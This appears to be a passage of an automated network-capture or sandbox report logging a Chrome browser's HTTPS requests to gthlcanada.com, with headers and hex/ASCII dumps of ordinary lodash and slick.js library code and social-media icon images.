                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:15 UTC521INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:15 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 50543
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Mon, 20 Jul 2015 18:25:53 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961971116 960893449
                                                                                                                          Age: 81
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"55ad3d31-c56f"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:15 UTC15863INData Raw: 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 0a 20 2a 20 6c 6f 64 61 73 68 20 33 2e 31 30 2e 31 20 28 43 75 73 74 6f 6d 20 42 75 69 6c 64 29 20 6c 6f 64 61 73 68 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 20 7c 20 55 6e 64 65 72 73 63 6f 72 65 2e 6a 73 20 31 2e 38 2e 33 20 75 6e 64 65 72 73 63 6f 72 65 6a 73 2e 6f 72 67 2f 4c 49 43 45 4e 53 45 0a 20 2a 20 42 75 69 6c 64 3a 20 60 6c 6f 64 61 73 68 20 6d 6f 64 65 72 6e 20 2d 6f 20 2e 2f 6c 6f 64 61 73 68 2e 6a 73 60 0a 20 2a 2f 0a 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 2c 74 29 7b 69 66 28 6e 21 3d 3d 74 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 3d 3d 3d 6e 2c 65 3d 6e 3d 3d 3d 77 2c 75 3d 6e 3d 3d 3d 6e 2c 6f 3d 6e 75 6c 6c 3d 3d 3d 74 2c 69 3d 74 3d 3d 3d 77 2c 66 3d 74 3d 3d 3d 74
                                                                                                                          Data Ascii: /** * @license * lodash 3.10.1 (Custom Build) lodash.com/license | Underscore.js 1.8.3 underscorejs.org/LICENSE * Build: `lodash modern -o ./lodash.js` */;(function(){function n(n,t){if(n!==t){var r=null===n,e=n===w,u=n===n,o=null===t,i=t===w,f=t===t
                                                                                                                          2025-01-13 21:01:15 UTC16384INData Raw: 76 61 72 20 66 3d 7a 6f 28 6e 29 2c 61 3d 66 2e 6c 65 6e 67 74 68 2c 63 3d 7a 6f 28 74 29 2e 6c 65 6e 67 74 68 3b 0a 69 66 28 61 21 3d 63 26 26 21 75 29 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 66 6f 72 28 63 3d 61 3b 63 2d 2d 3b 29 7b 76 61 72 20 6c 3d 66 5b 63 5d 3b 69 66 28 21 28 75 3f 6c 20 69 6e 20 74 3a 6e 75 2e 63 61 6c 6c 28 74 2c 6c 29 29 29 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 66 6f 72 28 76 61 72 20 73 3d 75 3b 2b 2b 63 3c 61 3b 29 7b 76 61 72 20 6c 3d 66 5b 63 5d 2c 70 3d 6e 5b 6c 5d 2c 68 3d 74 5b 6c 5d 2c 5f 3d 65 3f 65 28 75 3f 68 3a 70 2c 75 3f 70 3a 68 2c 6c 29 3a 77 3b 69 66 28 5f 3d 3d 3d 77 3f 21 72 28 70 2c 68 2c 65 2c 75 2c 6f 2c 69 29 3a 21 5f 29 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 73 7c 7c 28 73 3d 22 63 6f 6e 73 74 72 75 63 74
                                                                                                                          Data Ascii: var f=zo(n),a=f.length,c=zo(t).length;if(a!=c&&!u)return false;for(c=a;c--;){var l=f[c];if(!(u?l in t:nu.call(t,l)))return false}for(var s=u;++c<a;){var l=f[c],p=n[l],h=t[l],_=e?e(u?h:p,u?p:h,l):w;if(_===w?!r(p,h,e,u,o,i):!_)return false;s||(s="construct
                                                                                                                          2025-01-13 21:01:15 UTC16384INData Raw: 28 74 3d 77 29 2c 72 3d 2d 31 3b 66 6f 72 28 76 61 72 20 65 3d 7a 6f 28 6e 29 2c 75 3d 65 2e 6c 65 6e 67 74 68 2c 6f 3d 7b 7d 3b 2b 2b 72 3c 75 3b 29 7b 76 61 72 20 69 3d 65 5b 72 5d 2c 66 3d 6e 5b 69 5d 3b 74 3f 6e 75 2e 63 61 6c 6c 28 6f 2c 66 29 3f 6f 5b 66 5d 2e 70 75 73 68 28 69 29 3a 6f 5b 66 5d 3d 5b 69 5d 3a 6f 5b 66 5d 3d 69 7d 72 65 74 75 72 6e 20 6f 7d 2c 4e 6e 2e 69 6e 76 6f 6b 65 3d 61 6f 2c 4e 6e 2e 6b 65 79 73 3d 7a 6f 2c 4e 6e 2e 6b 65 79 73 49 6e 3d 52 65 2c 4e 6e 2e 6d 61 70 3d 75 65 2c 4e 6e 2e 6d 61 70 4b 65 79 73 3d 42 6f 2c 4e 6e 2e 6d 61 70 56 61 6c 75 65 73 3d 44 6f 2c 4e 6e 2e 6d 61 74 63 68 65 73 3d 4e 65 2c 4e 6e 2e 6d 61 74 63 68 65 73 50 72 6f 70 65 72 74 79 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 78
                                                                                                                          Data Ascii: (t=w),r=-1;for(var e=zo(n),u=e.length,o={};++r<u;){var i=e[r],f=n[i];t?nu.call(o,f)?o[f].push(i):o[f]=[i]:o[f]=i}return o},Nn.invoke=ao,Nn.keys=zo,Nn.keysIn=Re,Nn.map=ue,Nn.mapKeys=Bo,Nn.mapValues=Do,Nn.matches=Ne,Nn.matchesProperty=function(n,t){return x
                                                                                                                          2025-01-13 21:01:15 UTC1912INData Raw: 20 46 6e 3d 7b 7d 3b 46 6e 5b 42 5d 3d 46 6e 5b 44 5d 3d 46 6e 5b 4a 5d 3d 46 6e 5b 4d 5d 3d 46 6e 5b 71 5d 3d 46 6e 5b 58 5d 3d 46 6e 5b 48 5d 3d 46 6e 5b 51 5d 3d 46 6e 5b 6e 6e 5d 3d 46 6e 5b 74 6e 5d 3d 46 6e 5b 56 5d 3d 46 6e 5b 5a 5d 3d 46 6e 5b 59 5d 3d 46 6e 5b 47 5d 3d 46 6e 5b 72 6e 5d 3d 46 6e 5b 65 6e 5d 3d 46 6e 5b 75 6e 5d 3d 46 6e 5b 6f 6e 5d 3d 74 72 75 65 2c 46 6e 5b 50 5d 3d 46 6e 5b 4b 5d 3d 46 6e 5b 22 5b 6f 62 6a 65 63 74 20 4d 61 70 5d 22 5d 3d 46 6e 5b 22 5b 6f 62 6a 65 63 74 20 53 65 74 5d 22 5d 3d 46 6e 5b 22 5b 6f 62 6a 65 63 74 20 57 65 61 6b 4d 61 70 5d 22 5d 3d 66 61 6c 73 65 3b 76 61 72 20 4e 6e 3d 7b 22 5c 78 63 30 22 3a 22 41 22 2c 22 5c 78 63 31 22 3a 22 41 22 2c 22 5c 78 63 32 22 3a 22 41 22 2c 22 5c 78 63 33 22 3a 22 41
                                                                                                                          Data Ascii: Fn={};Fn[B]=Fn[D]=Fn[J]=Fn[M]=Fn[q]=Fn[X]=Fn[H]=Fn[Q]=Fn[nn]=Fn[tn]=Fn[V]=Fn[Z]=Fn[Y]=Fn[G]=Fn[rn]=Fn[en]=Fn[un]=Fn[on]=true,Fn[P]=Fn[K]=Fn["[object Map]"]=Fn["[object Set]"]=Fn["[object WeakMap]"]=false;var Nn={"\xc0":"A","\xc1":"A","\xc2":"A","\xc3":"A


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.11.2049819137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC596OUTGET /app/themes/base/assets/scripts/js/slick.js HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:15 UTC523INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:15 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 70274
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:19 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961417818 961775446
                                                                                                                          Age: 115
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-11282"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:15 UTC15861INData Raw: 2f 2a 0a 20 20 20 20 20 5f 20 5f 20 20 20 20 20 20 5f 20 20 20 20 20 20 20 5f 0a 20 5f 5f 5f 7c 20 28 5f 29 20 5f 5f 5f 7c 20 7c 20 5f 5f 20 20 28 5f 29 5f 5f 5f 0a 2f 20 5f 5f 7c 20 7c 20 7c 2f 20 5f 5f 7c 20 7c 2f 20 2f 20 20 7c 20 2f 20 5f 5f 7c 0a 5c 5f 5f 20 5c 20 7c 20 7c 20 28 5f 5f 7c 20 20 20 3c 20 5f 20 7c 20 5c 5f 5f 20 5c 0a 7c 5f 5f 5f 2f 5f 7c 5f 7c 5c 5f 5f 5f 7c 5f 7c 5c 5f 28 5f 29 2f 20 7c 5f 5f 5f 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7c 5f 5f 2f 0a 0a 20 56 65 72 73 69 6f 6e 3a 20 31 2e 35 2e 30 0a 20 20 41 75 74 68 6f 72 3a 20 4b 65 6e 20 57 68 65 65 6c 65 72 0a 20 57 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6b 65 6e 77 68 65 65 6c 65 72 2e 67 69 74 68 75 62 2e 69 6f 0a 20 20 20 20 44 6f 63 73 3a 20 68 74
                                                                                                                          Data Ascii: /* _ _ _ _ ___| (_) ___| | __ (_)___/ __| | |/ __| |/ / | / __|\__ \ | | (__| < _ | \__ \|___/_|_|\___|_|\_(_)/ |___/ |__/ Version: 1.5.0 Author: Ken Wheeler Website: http://kenwheeler.github.io Docs: ht
                                                                                                                          2025-01-13 21:01:15 UTC16384INData Raw: 6e 73 2e 64 72 61 67 67 61 62 6c 65 20 3d 3d 3d 20 74 72 75 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 5f 2e 24 6c 69 73 74 2e 61 64 64 43 6c 61 73 73 28 27 64 72 61 67 67 61 62 6c 65 27 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 62 75 69 6c 64 52 6f 77 73 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 5f 20 3d 20 74 68 69 73 2c 20 61 2c 20 62 2c 20 63 2c 20 6e 65 77 53 6c 69 64 65 73 2c 20 6e 75 6d 4f 66 53 6c 69 64 65 73 2c 20 6f 72 69 67 69 6e 61 6c 53 6c 69 64 65 73 2c 73 6c 69 64 65 73 50 65 72 53 65 63 74 69 6f 6e 3b 0a 0a 20 20 20 20 20 20 20 20 6e 65 77 53 6c 69 64 65 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61
                                                                                                                          Data Ascii: ns.draggable === true) { _.$list.addClass('draggable'); } }; Slick.prototype.buildRows = function() { var _ = this, a, b, c, newSlides, numOfSlides, originalSlides,slidesPerSection; newSlides = document.crea
                                                                                                                          2025-01-13 21:01:15 UTC16384INData Raw: 20 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 20 2b 20 31 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 5f 2e 6f 70 74 69 6f 6e 73 2e 63 65 6e 74 65 72 4d 6f 64 65 20 3d 3d 3d 20 74 72 75 65 29 20 6d 61 78 20 3d 20 5f 2e 73 6c 69 64 65 43 6f 75 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 50 6f 69 6e 74 20 3d 20 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 63 72 6f 6c 6c 20 2a 20 2d 31 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 75 6e 74 65 72 20 3d 20 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 63 72 6f 6c 6c 20 2a 20 2d 31 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 20 3d 20 5f 2e 73 6c 69 64 65 43 6f 75 6e 74 20 2a 20
                                                                                                                          Data Ascii: _.options.slidesToShow + 1; if (_.options.centerMode === true) max = _.slideCount; } else { breakPoint = _.options.slidesToScroll * -1; counter = _.options.slidesToScroll * -1; max = _.slideCount *
                                                                                                                          2025-01-13 21:01:15 UTC16384INData Raw: 76 61 72 20 74 61 72 67 65 74 48 65 69 67 68 74 20 3d 20 5f 2e 24 73 6c 69 64 65 73 2e 65 71 28 5f 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 29 2e 6f 75 74 65 72 48 65 69 67 68 74 28 74 72 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 5f 2e 24 6c 69 73 74 2e 63 73 73 28 27 68 65 69 67 68 74 27 2c 20 74 61 72 67 65 74 48 65 69 67 68 74 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 4f 70 74 69 6f 6e 20 3d 20 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 6b 53 65 74 4f 70 74 69 6f 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 28 6f 70 74 69 6f 6e 2c 20 76 61 6c 75 65 2c 20 72 65 66 72 65 73 68 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 5f 20 3d 20 74 68 69
                                                                                                                          Data Ascii: var targetHeight = _.$slides.eq(_.currentSlide).outerHeight(true); _.$list.css('height', targetHeight); } }; Slick.prototype.setOption = Slick.prototype.slickSetOption = function(option, value, refresh) { var _ = thi
                                                                                                                          2025-01-13 21:01:15 UTC5261INData Raw: 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 65 76 65 6e 74 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 20 21 3d 3d 20 75 6e 64 65 66 69 6e 65 64 20 26 26 20 5f 2e 74 6f 75 63 68 4f 62 6a 65 63 74 2e 73 77 69 70 65 4c 65 6e 67 74 68 20 3e 20 34 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 4f 66 66 73 65 74 20 3d 20 28 5f 2e 6f 70 74 69 6f 6e 73 2e 72 74 6c 20 3d 3d 3d 20 66 61 6c 73 65 20 3f 20 31 20 3a 20 2d 31 29 20 2a 20 28 5f 2e 74 6f 75 63 68 4f 62 6a 65 63 74 2e 63 75 72 58 20 3e 20 5f 2e 74 6f 75 63 68 4f 62 6a 65 63 74 2e 73 74 61 72 74 58 20 3f 20 31 20 3a 20 2d
                                                                                                                          Data Ascii: n; } if (event.originalEvent !== undefined && _.touchObject.swipeLength > 4) { event.preventDefault(); } positionOffset = (_.options.rtl === false ? 1 : -1) * (_.touchObject.curX > _.touchObject.startX ? 1 : -


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.11.204982054.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC651OUTGET /app/uploads/gthl/2024/08/29093927/icons8-youtube-48-1.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:15 UTC484INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 657
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Last-Modified: Thu, 29 Aug 2024 13:39:28 GMT
                                                                                                                          ETag: "ca52040004058032766383ad85952220"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 1717f995f2ca7c5df4d0a972f90c1564.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: gbCus0UWiJBKNKJj2AgaJRErC-TB_5JU9mGMZigQCgU0CQuIwPkLWQ==
                                                                                                                          2025-01-13 21:01:15 UTC657INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 02 43 49 44 41 54 78 9c ed 98 bb 6b 14 51 18 c5 4f 22 26 c1 22 92 08 62 63 6b a1 a8 45 40 d4 f9 be 24 6a 93 22 62 21 69 2c 2c a2 11 5f 60 69 27 42 44 0d b1 c9 3f 90 22 8f 46 b1 51 a2 01 31 e0 bb 50 b4 f0 81 8f 4a 12 b4 f1 15 71 09 46 d8 23 77 dc 59 74 49 9c 99 cc dd 9d 19 bd 3f 38 b0 0c b3 df 3d 87 3b 33 f7 de 0f 70 38 1c 0e 87 e3 7f 80 bb b0 8a 1e 36 d3 c3 6e 2a 8e 53 31 40 c1 18 05 13 14 dc a7 e0 05 05 ef a8 f8 e4 4b 30 47 05 7d fd fa 1d 5c 37 f7 3c a7 e0 9e ff 5f c5 28 05 e7 a8 38 e6 d7 36 63 6c 45 6b 72 c3 40 3d 05 7d 14 4c 51 51 28 9b a9 9d 0a a5 b1 0f 12 a8 8b 67 7e 3d 1a 28 98 4c c1
                                                                                                                          Data Ascii: PNGIHDR00WpHYsCIDATxkQO"&"bckE@$j"b!i,,_`i'BD?"FQ1PJqF#wYtI?8=;3p86n*S1@K0G}\7<_(86clEkr@=}LQQ(g~=(L


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.11.204982154.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC417OUTGET /app/uploads/gthl/2024/08/29093927/icons8-twitterx-48-1.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:15 UTC484INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 868
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Last-Modified: Thu, 29 Aug 2024 13:39:28 GMT
                                                                                                                          ETag: "a1e561aeb53f4f4312149a4c3f65888d"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 165ed32c12154887fba331169c8022ee.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: bjgfKlXrMaQ0Lhyjze1-4LOWyTZUfsQBj768P03sRauPO8yYfa6DdA==
                                                                                                                          2025-01-13 21:01:15 UTC868INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 03 16 49 44 41 54 78 9c ed 59 4b 4b e3 50 14 ce 0f 99 81 5c 9b 56 44 5b 37 62 0d 74 51 50 17 05 dd d8 2a 5d b4 0b dd b4 88 7f 40 b0 14 d7 6e 7c d6 85 3f 40 fa a0 82 a0 74 55 b1 45 ba 6d 29 8a 74 d3 87 0b 41 3a a5 8e f8 00 1f 67 38 67 26 99 a8 9d 71 9a c1 24 8b 1c 38 8b dc dc b4 df 97 7b be 7b be 24 1c 67 86 19 66 98 61 d8 b0 58 2c 5f 79 9e 4f f1 3c ff 9d 31 06 5a 26 ff f3 3f f7 78 9e ef 55 0d 9e 31 f6 4d 6b e0 ec 7d b6 10 4b d7 04 f0 ce 1b 00 3c fc ca 84 1a 02 9a 97 0d fb 73 39 5d 77 4d 40 6f d0 ec 4d 9a 04 98 b9 02 cc 38 25 24 08 02 14 8b 45 e8 14 89 44 e2 9f 00 cd cd cd c1 d3 d3 13 64 b3
                                                                                                                          Data Ascii: PNGIHDR00WpHYsIDATxYKKP\VD[7btQP*]@n|?@tUEm)tA:g8g&q$8{{$gfaX,_yO<1Z&?xU1Mk}K<s9]wM@oM8%$EDd


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.11.204982254.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC418OUTGET /app/uploads/gthl/2024/08/29093928/icons8-instagram-48-1.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:15 UTC485INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 2698
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Last-Modified: Thu, 29 Aug 2024 13:39:29 GMT
                                                                                                                          ETag: "b3c9ce60dd1d75ed3f597202c82c05e7"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 13af704549c5ac5d9fb78e3b737019ec.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: zC-XR6NWPXE3YrDSxn5v0-ecsSh1Rfmldkz74eYrC6qtLAT4UQoiNA==
                                                                                                                          2025-01-13 21:01:15 UTC2698INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 3c 49 44 41 54 78 9c ed 98 0b 54 55 65 16 c7 0f a8 90 8a af 1a 94 7b c9 07 88 89 1a 60 8a 4e 3a b5 7c 2b 92 02 8a 0f 90 67 12 58 4d 56 a6 93 33 d9 0c a9 65 2f cd 14 35 b5 7c 35 4e 3a 2a 56 4a 4b f3 51 1a 3e 52 2b 35 44 f1 81 20 f9 04 7c 00 17 b8 3c ee fd cd 3a df 77 ee b9 e2 63 c6 8b ce 9a 35 6b b1 d7 da 6b 5d ee 77 ce de ff df b7 f7 b7 cf e1 2a 4a 9d d5 59 9d d5 d9 ff 8d 05 f9 e0 1a d4 b1 78 d4 e0 2e a6 af 07 f9 95 96 07 75 36 59 87 fa 9a b8 57 1f e4 5f 46 9f 27 cd f4 ea 57 49 f7 60 0b 5d 43 ad 04 84 58 ca ba 86 58 72 02 42 2d 6b fc 43 19 db 79 34 2e ff 15 f1 43 3b 95 86 05 f9 96 64 df
                                                                                                                          Data Ascii: PNGIHDR00WpHYs<IDATxTUe{`N:|+gXMV3e/5|5N:*VJKQ>R+5D |<:wc5kk]w*JYx.u6YW_F'WI`]CXXrB-kCy4.C;d


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.11.2049824137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC463OUTGET /app/plugins/tagged_content_blocks/public/js/tagged-content-blocks-public.js?ver=1.0.0 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:15 UTC519INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:15 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 838
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:19 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961417820 961417477
                                                                                                                          Age: 116
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-346"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
